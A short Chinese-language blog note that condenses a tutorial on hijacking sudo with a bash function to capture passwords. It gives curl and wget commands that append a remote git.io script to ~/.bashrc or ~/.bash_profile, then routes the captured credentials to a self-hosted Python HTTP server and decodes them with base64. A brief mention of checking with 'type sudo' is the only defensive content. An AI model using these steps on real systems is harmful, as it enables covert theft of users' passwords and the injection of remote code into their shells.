每天都會有新方法讓我知道網路有多可怕,無意中發現這篇教人如何利用bash 的function 蓋掉(override)原來的sudo,取得密碼,真的動手做做看就會發現真的蠻可怕的,動手做步驗被我簡化了,想知道原理就從頭讀原po,想要動手試就看我的筆記
依OS決定怎麼把function加到bash
Debian or ubuntu
curl ‘https://git.io/fhNWm’ >> ~/.bashrc
wget -O- ‘https://git.io/fhNWm’ >> ~/.bashrcM
macOS
wget -O- ‘https://git.io/fhNWm’ >> ~/.bash_profile
然後登出或是重新開啟新視窗就可以測試
當有使用sudo要帳密時,就會把密碼寫到/tmp/hackedPasswd.txt中
但是要登入開啟文字檔才能把密碼抓出來也很麻煩,用python自架http server來抓資料
python -m http.server 8080
nano ~/.bashrc 把下面兩行註解拿掉,改成自己的ip
結果就會在有人打密碼時看到下面的log,帳號+密碼
把帳號冒號後的到==是密碼,把密碼在Linux上解碼echo ‘a2FsaQ==’ | base64 -d
知道了手法之後要怎麼防範呢?type sudo
原來的
被改過的
留言